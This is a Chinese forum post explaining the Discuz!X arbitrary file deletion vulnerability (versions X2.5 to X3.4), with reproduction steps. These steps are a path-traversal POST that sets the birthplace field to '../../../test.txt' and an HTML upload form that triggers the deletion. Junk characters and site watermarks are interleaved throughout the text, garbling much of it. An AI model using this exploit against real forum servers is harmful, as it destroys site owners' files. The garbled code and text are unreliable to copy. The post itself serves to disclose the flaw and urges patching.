热搜: GBK| UTF8SC| UTF8TC| BIG5|
分类
快捷导航
admin 发表于 2022-9-6 11:52:47 | 显示全部楼层 |阅读模式 打印 上一主题 下一主题
 
Crossday Discuz! Board(简称 Discuz!),是一个采用PHP和MySQL等其他多种数据库构建的性能优异、功能全面、安全稳定的社区论坛平台。2017年9月29日,Discuz! 修复了一个安全问题用于加强安全性,该安全问题会引发前台用户利用特殊构造的请求触发参与文件删除操作,导致任意文件删除漏洞的发生。下面,小编为大家带来关于该漏洞的技术详解。$ N/ B2 c, G/ G9 w7 c8 Owww.tmd0.com
3 E( I2 I- G; A' Xwww.tmd0.com
漏洞名称- h1 M" C0 v% K" P& Kwww.tmd0.com

) N0 ]7 P  ^. J/ |/ k: N; eDiscuz!X任意文件删除漏洞https://www.tmd9.com: y! @* l" M9 d. O! u4 H4 `3 Bwww.tmd0.com
: ^; g5 G$ E+ _3 ~; _& wwww.tmd0.com
影响范围
4 w! z: s; S7 R  J' z8 t# ^; s$ S$ z5 |4 Q; E! e& qwww.tmd0.com
Discuz!X2.5
& D. T: H6 x2 `8 Y8 _
; W$ F3 W2 w6 a( dDiscuz!X3.2
: \" ?4 P- e& q9 V) _) Q8 `9 e) ]6 Q2 W! K8 e! I6 W# M5 ?( ~6 t* s9 i# fwww.tmd0.com
Discuz!X3.3
* r4 T) t4 I& ~8 |/ Q& t& U8 ?4 ?8 U) e/ n( J+ P1 V5 _2 uwww.tmd0.com
Discuz!X3.4
3 L+ X  i+ i' D, _5 c& P. w2 P7 ]( p, O8 H1 jwww.tmd0.com
风险级别
3 ]' A4 y2 A1 V$ j0 e! @0 p' D
" M4 B) Y5 |0 W高危
" u! |  p" \/ a3 G& X7 e$ b# p0 w: p$ ^! v4 hwww.tmd0.com
为你展示“漏洞复现”
% b* X/ ?8 a- {' Q; T
8 r  J3 u; _( L1 i0 Z; \) T3 x登陆DZ前台账户并在当前目录下新建test.txt用于测试。
/ K3 k  n" C) Q- u! `4 u" ?. @" v! J# C7 Uwww.tmd0.com

6 L& {) A; ?$ S, `3 Y( ^: x0 s6 N+ C, Z. |www.tmd0.com

9 H4 c* B  A8 P/ \. w, c2 ]
4 q+ I. B- I! T请求home.php?mod=spacecp&ac=profile&op=base& q& `2 g9 P' p2 lwww.tmd0.com

# m/ q5 l( M- z5 yPOSTbirthprovince=../../../test.txt&profilesubmit=1&formhash=85cf7ef0! e; h. b6 M, [- v  e' w- z2 C- Hwww.tmd0.com
9 Q. V8 a7 D0 x4 {% V4 E& g% ]. jwww.tmd0.com
其中formhash为用户hash。
( ]# V: N5 N( _# @3 R
4 `* ^0 x8 B& ~1 n0 b% o1 U7 y3 U
* M/ ^4 H9 t# Q: P8 i$ a' @/ e
: [! r( W) K. P" ?修改成功之后,出生地就会变为“../../../test.txt”。
) d2 D+ W- R- |4 t; P
2 {! K  i$ y2 W" _8 o7 e% `构造请求向home.php?mod=spacecp&ac=profile&op=base&deletefile[birthprovince]=aaaaaa上传文件(普通图片即可)
8 ?" I# G4 `. B1 P$ M7 d3 P/ e- e+ t1 k4 Q6 |www.tmd0.com
<formaction=\"home.php?mod=spacecp&ac=profile&op=base&deletefile[birthprovince]=aaaaaa\"method=\"POST\" enctype=\"multipart/form-data\">2 e9 m$ ], G. a) |# zwww.tmd0.com
) a+ |5 c4 H. p+ A/ h# Hwww.tmd0.com
<inputtype=\"file\" name=\"birthprovince\" id=\"file\" />
5 O, ~) X  U& m0 h. E
) V: S% h2 e; @9 i, d7 ^( \7 K<inputtype=\"text\" name=\"formhash\"value=\"b644603b\"/></p>6 H' q+ n" h/ v# Bwww.tmd0.com

+ l( v0 C  I: @2 ^' M0 c<inputtype=\"text\" name=\"profilesubmit\"value=\"1\"/></p>
8 e) _& e& ]+ p0 _3 i. J8 B' S5 G: Iwww.tmd0.com
<inputtype=\"submit\" value=\"Submit\" />8 Q( U5 c8 O/ M* g; `www.tmd0.com
- m9 i: a# F( @7 N0 M  Jwww.tmd0.com
</from>
2 h/ M& V7 E, v1 L8 q& |7 G$ E, V" |4 E9 Xwww.tmd0.com
请求后文件被删除。
4 U6 v/ G% R! i5 ?2 }4 O% m3 m, a) h$ b( D9 Ewww.tmd0.com
, a) _2 ?- U# ?$ c1 L& N6 w  awww.tmd0.com

  ^$ e* {! ]8 h6 ], D, ^www.tmd9.com友情提示目前,Discuz! 官方已发布相关更新,请及时更新程序,以降低安全风险。
0 q; Z, a$ X5 L7 S

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?注册

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 注册

本版积分规则

会员达人更多
精彩分享

热门推荐

更多

最新信息

更多
[帮助 Help]Discuz! 求调用各个版块推荐主题的代码09-06
[帮助 Help]Discuz! 颜文字表情gbk版的用户可能会有乱09-06
[帮助 Help]Discuz! ucenter后台登录时的验证码如何改09-06
[帮助 Help]Discuz! X帖子内容页增加阅读全文功能09-06
[帮助 Help]Discuz! 亮剑云 商城APP插件配置教程和功能09-06
[帮助 Help]Discuz! 插件的通过数据库读取和缓存读取获09-06
[帮助 Help]Discuz! 插件接口概述09-06
[帮助 Help]Discuz! (新人求助)discuz 怎么查看所有09-06
[帮助 Help]Discuz! 模板机制09-06
[帮助 Help]Discuz! 导航如何输出?输出是可以自定义HT09-06
[帮助 Help]Discuz! 3.12. 版块群组置顶09-06
[帮助 Help]Discuz! 的插件机制 页面嵌入09-06
[帮助 Help]Discuz! 亮剑云 通过插件标识符即可轻松定09-06
[帮助 Help]Discuz! 调用主导航和二级导航09-06
[帮助 Help]Discuz! 亮剑云 请问“确认收货时长”在哪09-06
[帮助 Help]Discuz! 9.6. 签到领奖09-06
[帮助 Help]Discuz! 亮剑云 商家收入插件配置教程和功09-06
[帮助 Help]Discuz! Linux云计算架构-使用LNMP架构部署09-06
[帮助 Help]Discuz! 开发Discuz论坛插件教程09-06
[帮助 Help]Discuz! 2.5. 模板管理09-06
[帮助 Help]Discuz! 怎么判断帖子标题与内容开头的文字09-06
[帮助 Help]Discuz! 模板风格创建09-06
[帮助 Help]Discuz! 缓存调用09-06
[帮助 Help]Discuz! ucenter_members数据补齐common_me09-06
[帮助 Help]Discuz! 帖子ID和回帖ID恢复初始状态变成109-06
[帮助 Help]Discuz! 相册标题的字数长度被限制,在哪个09-06
[帮助 Help]Discuz! 《视频课堂点播直播》微信小程序打09-06
[帮助 Help]Discuz! 请问老大,关于默认缩略图问题09-06
[帮助 Help]Discuz! 简洁的Discuz! X2.5 论坛修改注册09-06
[帮助 Help]Discuz! 文章、帖子搜索结果缩略图显示09-06
Powered by Discuz! L1.0 Beta TMD0 Inc. 本站资源仅供学习等 ^_^ 请下载后24小时内删除 ^_^ 谢谢合作 ^_^   
中国互联网违法和不良信息举报中心
南昌网络警察报警平台
经营性网站备案信息
南昌市公安局网监备案
赣公网安备案